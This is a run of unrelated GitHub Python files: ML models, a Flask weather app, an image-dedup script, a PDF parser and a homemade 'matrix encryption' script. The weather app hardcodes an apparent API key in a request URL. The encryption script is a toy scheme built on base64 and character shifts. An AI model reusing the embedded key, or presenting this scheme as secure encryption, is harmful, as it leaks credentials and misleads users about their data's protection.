tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split(' ') #delimiter\n tmp_token = bench_data.Token_Data(block[0], block[1], float(block[2].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of YP130 linear mapped from 0 to 4\n\ndef process_simverb(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split('\\t') #delimiter\n tmp_token = bench_data.Token_Data(block[0], block[1], float(block[3].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of SimVerb-3500 linear mapped from 0 to 10\n\ndef process_stanford(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split('\\t') #delimiter\n tmp_token = bench_data.Stanford_Data(block[1], block[2], block[3], block[4], block[5], block[6], float(block[7].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of Stanford linear mapped from 0.0 to 10.0\n\ndef sentece_wrapper(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split('\\t') #delimiter\n work_token = bench_data.Work_Data()\n work_token.word1 = block[1]\n work_token.word2 = block[3]\n work_token.sent1 = sp.tokenize_text(block[5])\n work_token.sent2 = sp.tokenize_text(block[6])\n work_token.simvalue = float(block[7].strip('\\n'))\n tokens_list.append(work_token)\n return(tokens_list)\n#reads and wrap tokens separated by \n#creates a list of Stanford linear mapped from 0.0 to 10.0\n\n#===============================================================================\n# FOLDER MANIPULATION\n#===============================================================================\n\ndef fname_splitter(docslist):\n fnames = []\n for doc in docslist:\n blocks = doc.split('\\\\')\n fnames.append(blocks[len(blocks)-1])\n return(fnames)\n#getting the filenames from uri of whatever documents were processed in the input folder \n\ndef doclist_multifolder(folder_name):\n input_file_list = []\n for roots, dir, files in os.walk(folder_name):\n for file in files:\n file_uri = os.path.join(roots, file)\n #file_uri = file_uri.replace(\"\\\\\",\"/\") #if running on windows \n if file_uri.endswith('txt'): input_file_list.append(file_uri)\n return input_file_list\n#creates list of documents in many folders\n\ndef write_ind_tokens(folder, fname, tokens): \n #print('Saving %s Document' %bsd_fname)\n doc = open(folder +'/'+ fname, 'w+') \n #currently using just Word \\t SynsetID \\t offset \\t pos\n for token in tokens:\n doc.write(token.word1 +'\\t'+ token.word2 +'\\t'+ str(token.simvalue) + '\\n')\n doc.close()\n#writes output file with word1 word2 sim_value\n","repo_name":"truas/ValidateSimilarity","sub_path":"default/io_operations.py","file_name":"io_operations.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"33110265208","text":"import torch\nimport torch.nn as nn\nfrom collections import OrderedDict\nfrom torch.utils.data import Dataset\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\nclass AlexNet(nn.Module):\n \"\"\"\n 原网络为双GPU,此处全部只实现一半\n Input - 3x227x227\n <1>\n C1 - 48@55x55 (11x11 kernel)(4 stride)\n ReLU1\n S1 - 48@27x27 (3x3 kernel, stride 2) Subsampling\n LRN\n <2>\n C2 - 128@27x27 (5x5 kernel)(1 stride)(2 padding)\n ReLU2\n S2 - 128@13x13 (3x3 kernel, stride 2) Subsampling\n LRN\n <3>\n C3 - 192@13x13 (3x3 kernel)(1 stride)(1 padding)\n ReLU3\n <4>\n C4 - 192@13x13 (3x3 kernel)(1 stride)(1 padding)\n ReLU4\n <5>\n C5 - 128@13x13 (3x3 kernel)(1 stride)(1 padding)\n ReLU5\n S5 - 128@6x6 (3x3 kernel, stride 2) Subsampling\n <6>\n C6 - 2048@1x1 (6x6 kernel)\n ReLU6\n Dropout (p=0.5)\n <7>\n F7 - 2048\n ReLU7\n Dropout (p=0.5)\n <8>\n F8 - 6 (Output)\n \"\"\"\n def __init__(self):\n super(AlexNet, self).__init__()\n\n self.convnet = nn.Sequential(OrderedDict([\n ('C1 ', nn.Conv2d(3, 64, kernel_size=11, stride=4, padding=2)),\n ('ReLU1', nn.ReLU(inplace=True)),\n ('S1 ', nn.MaxPool2d(kernel_size=3, stride=2)),\n\n ('C2 ', nn.Conv2d(64, 192, kernel_size=5, padding=2)),\n ('ReLU3', nn.ReLU(inplace=True)),\n ('S2 ', nn.MaxPool2d(kernel_size=3, stride=2)),\n ('C3 ', nn.Conv2d(192, 384, kernel_size=3, padding=1)),\n ('ReLU3', nn.ReLU(inplace=True)),\n ('C4 ', nn.Conv2d(384, 256, kernel_size=3, padding=1)),\n ('ReLU4', nn.ReLU(inplace=True)),\n ('C5 ', nn.Conv2d(256, 256, kernel_size=3, padding=1)),\n ('ReLU5', nn.ReLU(inplace=True)),\n ('S5 ', nn.MaxPool2d(kernel_size=3, stride=2)),\n\n ('Avg6 ', nn.AdaptiveAvgPool2d((6, 6))),\n ('Drop6', nn.Dropout()),\n ]))\n\n self.fc = nn.Sequential(OrderedDict([\n ('F7 ', nn.Linear(256*6*6, 1024)),\n ('ReLU7', nn.ReLU(inplace=True)),\n ('Drop7', nn.Dropout()),\n ('F8 ', nn.Linear(1024, 6)),\n ]))\n\n def forward(self, x):\n x = self.convnet(x)\n x = torch.flatten(x, 1)\n x = self.fc(x)\n return x\n\n\nclass CarDataset(Dataset):\n \"\"\"car dataset load\"\"\"\n\n def __init__(self, datapath, train=True):\n \"\"\"\n Args:\n datapath:filename\n train(optional):traindata or testdata\n\n \"\"\"\n self.label = []\n self.image = []\n self.train = train\n self.len = 0\n self.N = 227\n\n # 加载数据集\n tmp = []\n k = 0\n if train:\n with open(datapath, 'r', encoding='ascii') as fp:\n for line in fp:\n k += 1\n if k==1 :\n self.label.append(int(line))\n else:\n img = np.array(line.split(','), dtype = float)\n tmp.append(img.reshape(self.N, self.N))\n if k==4:\n self.image.append(tmp)\n tmp = []\n k = 0\n else:\n with open(datapath, 'r', encoding='ascii') as fp:\n for line in fp:\n k += 1\n img = np.array(line.split(','), dtype = float)\n tmp.append(img.reshape(self.N, self.N))\n if k==3:\n self.image.append(tmp)\n tmp = []\n k = 0\n self.image = torch.from_numpy(np.array(self.image))\n self.len = len(self.image)\n\n\n def __len__(self):\n return self.len\n\n def __getitem__(self, idx):\n if self.train:\n return (self.image[idx].float(), torch.tensor(self.label[idx]))\n else:\n return self.image[idx]\n\n def shape(self):\n print(self.image.shape)\n \n def show(self, idx):\n if self.train:\n print(self.label[idx])\n img = np.array(self.image[idx], dtype=int)\n img = np.transpose(img, (1,2,0))\n plt.imshow(img)\n plt.show()\n \n\n\n\nif __name__ == '__main__':\n\n net = AlexNet()\n print(net)\n\n","repo_name":"Ten2016/Graduation-design","sub_path":"code/AlexNet_model.py","file_name":"AlexNet_model.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"193940210","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/11/29 21:02\n# @Author : Godder\n# @File : mb_fcn.py\n########################################\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom layers.functions import Detect, PriorBoxLayer\nimport math\nimport os\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, self.expansion * planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion * planes)\n\n self.downsample = nn.Sequential()\n if stride != 1 or in_planes != self.expansion * planes:\n self.downsample = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion * planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)), inplace=True)\n out = F.relu(self.bn2(self.conv2(out)), inplace=True)\n out = self.bn3(self.conv3(out))\n out += self.downsample(x)\n out = F.relu(out, inplace=True)\n return out\n\n\nclass MB_FCN(nn.Module):\n def __init__(self, phase, num_class, block, num_blocks, size, connections, strides):\n super(MB_FCN, self).__init__()\n self.phase = phase\n self.in_planes = 64\n self.num_class = num_class\n self.size = size\n self.priorboxs = PriorBoxLayer(size, size, stride=strides)\n self.priors = None\n self.connections = connections\n self.strides = strides\n\n # Resnet network\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\n # 修改stride 使得深层的感受野大小于浅层大小相同(只修改layer4)\n self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=1)\n out_channels = [64, 64 * 4, 128 * 4, 256 * 4, 512 * 4]\n\n # 下采样的pooling\n self.downspamle_maxpools = list() # type: list\n self.downspamle_features = list() # type: list\n # 用于上采样的反卷积层\n self.deconvs = list() # type:list\n self.upsample_features = list() # type: list\n upsample_padding = [(1, 1), (0, 1), (0, 5)] # 用于转置卷积的padding参数,对应放大2倍,4倍,8倍\n self.out_channels = []\n for stride, connection in zip(strides, connections):\n pools = list()\n deconv = list()\n down_features = list()\n up_features = list()\n channels = 0\n for c in connection:\n channels += out_channels[c-1]\n current_stride = pow(2, c)\n if c == 5:\n current_stride //= 2\n if pow(2, c) < stride:\n pool = nn.MaxPool2d(kernel_size=3, stride=stride // pow(2, c), padding=1) # type: nn.MaxPool2d\n if c == 5:\n pool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1) # type: nn.MaxPool2d\n pools.append(pool)\n down_features.append(c)\n elif current_stride > stride:\n upsample_time = current_stride // stride\n padding_index = int(math.log(upsample_time, 2) - 1)\n convT = nn.ConvTranspose2d(out_channels[c - 1], out_channels[c - 1], kernel_size=3, \\\n stride=upsample_time, padding=upsample_padding[padding_index][0], \\\n output_padding=upsample_padding[padding_index][1])\n deconv.append(convT)\n up_features.append(c)\n self.downspamle_maxpools.append(pools)\n self.downspamle_features.append(down_features)\n self.deconvs.append(deconv)\n self.upsample_features.append(up_features)\n self.out_channels.append(channels)\n\n # 用于提取位置信息和人脸信息的单层卷积序列\n loc = []\n conf = []\n for channels in self.out_channels:\n loc.append(nn.Conv2d(channels, 4, kernel_size=3, stride=1, padding=1))\n conf.append(nn.Conv2d(channels, 4, kernel_size=3, stride=1, padding=1))\n self.loc = nn.ModuleList(loc)\n self.conf = nn.ModuleList(conf)\n\n if phase == 'test':\n self.softmax = nn.Softmax(dim=-1)\n self.detect = Detect(num_class, 0, 750, 0.05, 0.3)\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1) # [stride, 1, 1...(num_blocks-1)]\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x):\n source = list() # 用来存储不同branch的特征\n loc = list()\n conf = list()\n\n # Resnet 提取特征\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x1 = self.maxpool(x) # type: torch.Tensor\n\n x2 = self.layer1(x1) # type: torch.Tensor\n x3 = self.layer2(x2) # type: torch.Tensor\n x4 = self.layer3(x3) # type: torch.Tensor\n x5 = self.layer4(x4) # type: torch.Tensor\n features = [x1, x2, x3, x4, x5]\n\n # 各branch特征提取,合并放入source中\n for down_pools, down_features, deconv, up_features, connection in\\\n zip(self.downspamle_maxpools, self.downspamle_features, self.deconvs, self.upsample_features, self.connections):\n connection_features = []\n i = 0\n j = 0\n for c in connection:\n feature = features[c - 1]\n if c in down_features:\n feature = down_pools[i](feature)\n i += 1\n elif c in up_features:\n feature = deconv[j](feature)\n j += 1\n connection_features.append(feature)\n source.append(torch.cat(connection_features, 1))\n\n # prior box提取\n prior_box = []\n for idx, f_layer in enumerate(source): #type: int, torch.Tensor\n prior_box.append(self.priorboxs.forward(idx, f_layer.shape[3], f_layer.shape[2]))\n with torch.no_grad():\n self.priors = torch.cat([p for p in prior_box], 0)\n print(self.priors.shape, prior_box[0].shape)\n\n # 对feature map 进行信息提取\n for idx, (x, l , c) in enumerate(zip(source, self.loc, self.conf)):\n if idx == 0: # 浅层信息提取\n tmp_conf = c(x) # type: torch.Tensor\n a, b, c, pos_conf = tmp_conf.chunk(4, 1)\n neg_conf = torch.cat([a, b, c], 1) # type: torch.Tensor\n max_conf, _ = neg_conf.max(1)\n max_conf = max_conf.view_as(pos_conf)\n conf.append(torch.cat([max_conf, pos_conf], 1).permute(0, 2, 3, 1).contiguous())\n else:\n tmp_conf = c(x) # type: torch.Tensor\n neg_conf, a, b, c = tmp_conf.chunk(4, 1)\n pos_conf = torch.cat([a, b, c], 1) # type: torch.Tensor\n max_conf, _ = pos_conf.max(1) # type: torch.Tensor, torch.Tensor\n max_conf = max_conf.view_as(neg_conf)\n conf.append(torch.cat([neg_conf, max_conf], 1).permute(0, 2, 3, 1).contiguous())\n loc.append(l(x).permute(0, 2, 3, 1).contiguous())\n\n # 整理提取信息\n loc = torch.cat([o.view(o.size(0), -1) for o in loc], 1) # 将每个loc中的tensor转为(batch_size, H*W*4),然后结合\n conf = torch.cat([o.view(o.size(0), -1) for o in conf], 1) # (batch_size, H*W*2)\n\n if self.phase == \"test\":\n output = self.detect(\n loc.view(loc.size(0), -1, 4), # loc preds\n self.softmax(conf.view(conf.size(0), -1, 2)), # conf preds\n self.priors.type(type(x.data)) # default boxes\n )\n else:\n output = (\n loc.view(loc.size(0), -1, 4), # (batch_size, H*W, 4)\n conf.view(conf.size(0), -1, 2), # (batch_size, H*W, 2)\n self.priors,\n )\n return output\n\n def load_weights(self, base_file):\n other, ext = os.path.splitext(base_file)\n if ext == '.pkl' or '.pth':\n print('Loading weights into state dict...')\n pretrained_model = torch.load(base_file, map_location=lambda storage, loc: storage)\n model_dict = self.state_dict()\n pretrained_model = {k: v for k, v in pretrained_model.items() if k in model_dict}\n model_dict.update(pretrained_model)\n self.load_state_dict(model_dict)\n print('Finished!')\n else:\n print('Sorry only .pth and .pkl files supported.')\n\n\ndef build_model(phase, size=640, num_class=2):\n if phase != \"test\" and phase != \"train\":\n print(\"Error: Phase not recognized\")\n return\n if size != 640:\n print(\"Error: Sorry only 640 is supported currently!\")\n return\n return MB_FCN(phase, num_class, Bottleneck, [3, 4, 6, 3], size, [[3, 4, 5], [4, 5]], [8, 16])\n","repo_name":"WangGodder/MB-FCN_pytorch","sub_path":"mb_fcn.py","file_name":"mb_fcn.py","file_ext":"py","file_size_in_byte":10042,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"41181631680","text":"from flask import render_template,request\nimport requests\nfrom datetime import datetime\nfrom app import app\n\n\n@app.route('/', methods = ['GET', 'POST'])\ndef mainpage():\n dt = datetime.now()\n dt = dt.strftime('%d/%m/%Y %I:%M %p')\n city = \"\"\n state = \"\"\n tempf = \"\"\n skycondition =\"\"\n reportfrom = \"\"\n currweathericon = \"\"\n if request.method == 'POST':\n city = request.form['city']\n state = request.form['state']\n\n if city != \"\":\n r = requests.get(\"http://api.wunderground.com/api/b912244185f64b1c/geolookup/conditions/q/\"+ state +\"/\"+ city+\".json\")\n data = r.json()\n currweathericon = str(data['current_observation']['icon_url'])\n tempf = str(data['current_observation']['temp_f']) + \"F\"\n skycondition = data['current_observation']['weather']\n reportfrom = data['current_observation']['observation_location']['full']\n\n return render_template('mainpage.html',city = city,\n state = state,\n dt=dt,\n currweathericon=currweathericon,\n tempf = tempf,\n skycondition = skycondition,\n reportfrom = reportfrom)\n","repo_name":"tallenttu/weatherapplication","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16609256336","text":"import unittest\nfrom unittest.mock import Mock\n\nfrom aops_check.errors.startup_error import StartupError\n\n\nclass StartupErrorTestCase(unittest.TestCase):\n def test_get_check_mode_property(self):\n check_mode = Mock()\n error = StartupError(check_mode, Mock())\n self.assertEqual(error.check_mode, check_mode)\n\n def test_get_support_mode_property(self):\n support_mode = [Mock(), Mock()]\n error = StartupError(Mock(), support_mode)\n self.assertEqual(error.support_mode, support_mode)\n\n def test_str_should_return_correct_result(self):\n check_mode = \"a\"\n support_mode = [\"b\", \"c\"]\n error = StartupError(check_mode, support_mode)\n self.assertEqual(str(error), f\"Check module's mode should be in ['b', 'c'], not a\")\n","repo_name":"openeuler-mirror/A-Ops","sub_path":"aops-check/aops_check/tests/errors/test_startup_error.py","file_name":"test_startup_error.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"13035569881","text":"# This script is used to remove duplicated pictures from a folder and it's sub folders, based on image average hashing\nfrom PIL import Image\nimport imagehash, sqlite3, os, time\n\ndef getListOfFiles(dirName):\n\tlistOfFile = os.listdir(dirName)\n\tallFiles = list()\n\tfor entry in listOfFile:\n\t\tfullPath = os.path.join(dirName, entry)\n\t\tif os.path.isdir(fullPath):\n\t\t\tallFiles = allFiles + getListOfFiles(fullPath)\n\t\telse:\n\t\t\tallFiles.append(fullPath)\n\treturn allFiles\n\nconn = sqlite3.connect(\"dump.db\")\ncur = conn.cursor()\ncur.execute(\"CREATE TABLE IF NOT EXISTS pic(name text, hash text)\")\n\nfileList = getListOfFiles(\"tumblr_new\")\nprint(\"rebuilt file list\")\nlast = time.time()\n\nfor file in fileList:\n\tif time.time() - last > 5:\n\t\tprint(\"Processed \", str(fileList.index(file) / len(fileList) * 100), '%')\n\t\tlast = time.time()\n\ttry:\n\t\thash = str(imagehash.average_hash(Image.open(file), 16))\n\texcept:\n\t\tcontinue\n\tcur.execute(\"SELECT name FROM pic WHERE hash=?\", (hash, ))\n\tresultName = cur.fetchone()\n\tif not resultName:\n\t\tcur.execute(\"INSERT INTO pic(name,hash) VALUES(?,?)\", (file, hash, ))\n\telse:\n\t\tif file == resultName[0]:\n\t\t\tcontinue\n\t\tsizeNew = os.path.getsize(file)\n\t\tsizeOld = os.path.getsize(resultName[0])\n\t\tif sizeNew > sizeOld:\n\t\t\tcur.execute(\"UPDATE pic SET name=? WHERE hash=?\", (file, hash, ))\n\t\t\tos.remove(resultName[0])\n\t\t\tprint(\"deleted \", resultName[0])\n\t\telif sizeNew <= sizeOld:\n\t\t\tos.remove(file)\n\t\t\tprint(\"deleted \", file)\nconn.commit()","repo_name":"smdll/My_Utilities","sub_path":"RmPicDups.py","file_name":"RmPicDups.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7456335029","text":"import base64\r\nimport numpy as np\r\nimport random\r\ndef split(word):\r\n return [char for char in word]\r\ndef met(x):\r\n switcher={\r\n 'a':2,\r\n 'b':1,\r\n 'c':10,\r\n 'd':16,\r\n 'e':3,\r\n 'f':4,\r\n 'g':12,\r\n 'h':17,\r\n 'i':5,\r\n 'j':6,\r\n 'k':13,\r\n 'l':18,\r\n 'm':21,\r\n 'n':24,\r\n 'o':7,\r\n 'p':8,\r\n 'q':14,\r\n 'r':19,\r\n 's':22,\r\n 't':25,\r\n 'u':11,\r\n 'v':9,\r\n 'w':15,\r\n 'x':20,\r\n 'y':23,\r\n 'z':26,\r\n 'A':2,\r\n 'B':1,\r\n 'C':10,\r\n 'D':16,\r\n 'E':3,\r\n 'F':4,\r\n 'G':12,\r\n 'H':17,\r\n 'I':5,\r\n 'J':6,\r\n 'K':13,\r\n 'L':18,\r\n 'M':21,\r\n 'N':24,\r\n 'O':7,\r\n 'P':8,\r\n 'Q':14,\r\n 'R':19,\r\n 'S':22,\r\n 'T':25,\r\n 'U':11,\r\n 'V':9,\r\n 'W':15,\r\n 'X':20,\r\n 'Y':23,\r\n 'Z':26,\r\n '0':0,\r\n '1':1,\r\n '2':2,\r\n '3':3,\r\n '4':4,\r\n '5':5,\r\n '6':6,\r\n '7':7,\r\n '8':8,\r\n '9':9\r\n }\r\n return switcher.get(x)\r\nprint(\"\\t\\t\\t\\t\\t\\t\\t\\t\\tSIMPLE MATRIX ENCRYPTION TECHNIQUE\")\r\nprint(\"\\nENCRYPTION:\\n\")\r\nplain_txt = input(\"Enter text to be encrypted:\")\r\nplain_txt_bytes = plain_txt.encode(\"ascii\")\r\n\r\nbase64_bytes = base64.b64encode(plain_txt_bytes)\r\nbase64_string = base64_bytes.decode(\"ascii\")\r\n\r\nprint(f\"\\nEncoded string: {base64_string}\\n\")\r\n\r\nl= len(base64_string)\r\nc=base64_string.count(\"=\")\r\nl=l-c\r\ncode=base64_string[0:l]\r\ns=(l%3)+2\r\nsubstrings = [code[i:i+s] for i in range(0, l, s)]\r\n#print(substrings)\r\nnlist=[code[i:i+s] for i in range(0,l,s)]\r\n\r\nfor x in range(len(substrings)):\r\n substrings[x]=split(substrings[x])\r\n\r\nfor x in range(len(nlist)):\r\n nlist[x]=split(nlist[x])\r\n\r\nfor i in range(len(substrings)):\r\n for j in range(len(substrings[i])):\r\n substrings[i][j]=met(substrings[i][j])\r\n\r\n#print(substrings)\r\n\r\nwhile len(substrings[len(substrings)-1])!=len(substrings[len(substrings)-2]):\r\n substrings[len(substrings)-1].append(1)\r\nm=len(substrings)%s\r\nt=s-m\r\nif s==2:\r\n while t!=0:\r\n substrings.append([1,1])\r\n t-=1\r\n \r\nelif s==3:\r\n while t!=0:\r\n substrings.append([1,1,1])\r\n t-=1\r\n\r\nelif s==4:\r\n while t!=0:\r\n substrings.append([1,1,1,1])\r\n t-=1\r\n \r\n\r\n#print(substrings)\r\n\r\ndetm=[]\r\nif s==2:\r\n for i in range(0,len(substrings),s):\r\n arr2=np.array([substrings[i],substrings[i+1]])\r\n #print(arr)\r\n D = np.linalg.det(arr2)\r\n detm.append(round(D%26))\r\n print(\"Determinants:\",detm)\r\n\r\nelif s==3:\r\n for i in range(0,len(substrings),s):\r\n arr3=np.array([substrings[i],substrings[i+1],substrings[i+2]])\r\n #print(arr)\r\n D = np.linalg.det(arr3)\r\n detm.append(round(D%26))\r\n print(\"Determinants:\",detm)\r\n\r\nelif s==4:\r\n for i in range(0,len(substrings),s):\r\n arr4=np.array([substrings[i],substrings[i+1],substrings[i+2],substrings[i+3]])\r\n #print(arr)\r\n D = np.linalg.det(arr4)\r\n detm.append(round(D%26))\r\n print(\"Determinants:\",detm)\r\nr=random.randint(1,99)\r\nprint(\"\\nSecret key:\",r)\r\nfor i in range(len(detm)):\r\n if len(detm)%2==0 :\r\n res = [x + r*i for x in detm]\r\n else:\r\n res = [x - r*i for x in detm]\r\nprint(\"\\nEncrypted determinants:\" + str(res))\r\n#print(nlist)\r\nk=0\r\ncnt=0\r\nf1=[]\r\n\r\nfor i in range(len(nlist)):\r\n for j in range(len(nlist[i])):\r\n if ord(nlist[i][j])>=65 and ord(nlist[i][j])<=90:\r\n d=ord(nlist[i][j])\r\n x=d-64\r\n #print(x)\r\n A=x+detm[k]\r\n if A>26:\r\n A-=26\r\n A=chr(A+64)\r\n #nlist[i][j]=A\r\n f1.append(A)\r\n \r\n elif ord(nlist[i][j])>=97 and ord(nlist[i][j])<=122:\r\n l=ord(nlist[i][j])\r\n p=l-96\r\n #print(p)\r\n b=p-detm[k]\r\n if b<=0:\r\n b+=26\r\n b=chr(b+96)\r\n #nlist[i][j]=a\r\n f1.append(b)\r\n \r\n elif ord(nlist[i][j])>=48 and ord(nlist[i][j])<=57:\r\n m=ord(nlist[i][j])\r\n n=m-48\r\n #print(n)\r\n #nlist[i][j]=m\r\n if n%2==0:\r\n n+=4\r\n if n>9:\r\n n-=10\r\n else:\r\n n-=4\r\n if n<0:\r\n n+=10\r\n \r\n f1.append(str(n))\r\n \r\n cnt+=1\r\n \r\n if cnt==(s*s):\r\n k+=1\r\n cnt=0\r\n \r\n#print(f1) \r\nct=\"\"\r\nct=ct.join(f1)\r\n#print(ct)\r\n\r\nprint(\"\\nENCRYPTED CODE:\",ct,\",\",str(res))\r\n\r\n#DECRYPTION\r\nfor i in range(len(res)):\r\n if len(res)%2==0 :\r\n dd = [x - r*i for x in res]\r\n else:\r\n dd = [x + r*i for x in res]\r\nprint(\"\\n\\nDECRYPTION:\\n\")\r\nprint(\"Decrypted determinants:\" + str(dd))\r\n\r\nf=(len(ct)%3)+2\r\ndstr = [ct[i:i+s] for i in range(0,len(ct),f)]\r\n#print(dstr)\r\nfor x in range(len(dstr)):\r\n dstr[x]=split(dstr[x])\r\n#print(dstr)\r\n\r\n\r\n\r\ndk=0\r\ndcnt=0\r\ndf1=[]\r\n\r\nfor i in range(len(dstr)):\r\n for j in range(len(dstr[i])):\r\n if ord(dstr[i][j])>=65 and ord(dstr[i][j])<=90:\r\n d=ord(dstr[i][j])\r\n x=d-64\r\n #print(x)\r\n A=x-dd[dk]\r\n if A<=0:\r\n A+=26\r\n A=chr(A+64)\r\n #nlist[i][j]=A\r\n df1.append(A)\r\n \r\n elif ord(dstr[i][j])>=97 and ord(dstr[i][j])<=122:\r\n l=ord(dstr[i][j])\r\n p=l-96\r\n #print(p)\r\n b=p+dd[dk]\r\n if b>26:\r\n b-=26\r\n b=chr(b+96)\r\n #nlist[i][j]=a\r\n df1.append(b)\r\n \r\n elif ord(dstr[i][j])>=48 and ord(dstr[i][j])<=57:\r\n m=ord(dstr[i][j])\r\n n=m-48\r\n #print(n)\r\n #nlist[i][j]=m\r\n if n%2==0:\r\n n-=4\r\n if n<0:\r\n n+=10\r\n else:\r\n n+=4\r\n if n>9:\r\n n-=10\r\n \r\n df1.append(str(n))\r\n \r\n dcnt+=1\r\n \r\n if dcnt==(s*s):\r\n dk+=1\r\n dcnt=0\r\n \r\n#print(df1)\r\ndt=\"\"\r\ndt=dt.join(df1)\r\nwhile c!=0:\r\n dt=dt + \"=\"\r\n c-=1\r\nprint(\"\\nDECRYPTED CODE:\",dt)\r\n\r\ndbase64_bytes = dt.encode(\"ascii\")\r\n\r\ndstring_bytes = base64.b64decode(dbase64_bytes)\r\ndstring = dstring_bytes.decode(\"ascii\")\r\n\r\nprint(f\"\\nDECRYPTED MESSAGE: {dstring}\")\r\n\r\n\r\n","repo_name":"Rahulvr7/MET","sub_path":"src.py","file_name":"src.py","file_ext":"py","file_size_in_byte":6600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31611321889","text":"import re\nimport fitz\nfrom tika import parser\n\n\ndef parse_pdf(file_path, write=True):\n \"\"\"\n Extracts text from pdf files while using tika parser\n\n :param file_path: file to be parsed\n :param write: write output to hard disk\n :return: list of strings\n \"\"\"\n rawText = parser.from_file(file_path)\n rawList = rawText[\"content\"].splitlines()\n\n rawTextClean = re.compile(r\"[\"\n r\"\\t\"\n # r\"\\d\"\n r\"]+\")\n\n remove_special_chars = re.compile(r\"^\\W \")\n remove_punc = re.compile(r\"[\\.,/:()\\[\\]\\\\%!?_] ?| ?[\\.,/:()\\[\\]\\\\%!?_]|^–\")\n remove_multiple_ws = re.compile(r\" +\")\n\n cleanList = [x for x in rawList if x]\n print(cleanList)\n cleanList = [re.sub(rawTextClean, \" \", x).strip() for x in cleanList]\n cleanList = [re.sub(remove_special_chars, \"\", x).strip() for x in cleanList if x]\n print(cleanList)\n # cleanList = [re.sub(remove_punc, \" \", x).strip() for x in cleanList if x]\n # print(*cleanList, sep=\"\\n\")\n print(cleanList)\n cleanList = [re.sub(remove_multiple_ws, \" \", x).strip() for x in cleanList if x]\n print(*cleanList, sep=\"\\n\")\n\n if write:\n file_out = file_path.replace(\"bewerbungen_raw\\\\\", \"bewerbungen_raw\\\\output\\\\\")\n out_file = open(file_out.replace(\".pdf\", \".txt\"), \"w\", encoding=\"utf-8\")\n for line in cleanList:\n out_file.write(line + \"\\n\")\n\n return cleanList\n\n\ndef parse_pymupdf(file_path, multi_line=True):\n \"\"\"\n extracts text from pdf file while using pymupdf (fitz) and returns a (single line) string\n\n :param multi_line: boolean for deciding if output is single line string or list of strings\n :param file_path: file to be parsed\n :return: text as single line string or list of strings\n \"\"\"\n doc = fitz.open(file_path)\n text = \"\"\n for page in doc:\n text = text + str(page.getText())\n if multi_line:\n output = text.split(\"\\n\")\n else:\n output = \" \".join(text.split(\"\\n\"))\n output = re.sub(r\" +\", \" \", output).strip()\n\n return output\n\n\n\n","repo_name":"Marshmellow24/CoverletterGen","sub_path":"python/NER/Data_Parsing/pdf_extraction.py","file_name":"pdf_extraction.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"7403987561","text":"from datetime import datetime\nfrom drf_spectacular.utils import extend_schema, OpenApiExample, OpenApiParameter\nfrom rest_framework import generics\nfrom rest_framework import permissions\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom automations.models import ClassifiedOccurrence, COUsage\nfrom db_materials.models import MaterialElement, MEUsage\nfrom db_materials.serializers import MEUsageSerializer, ScaffoldingRequestSerializer\n\n\nclass MEUsageAPIView(generics.ListAPIView):\n queryset = 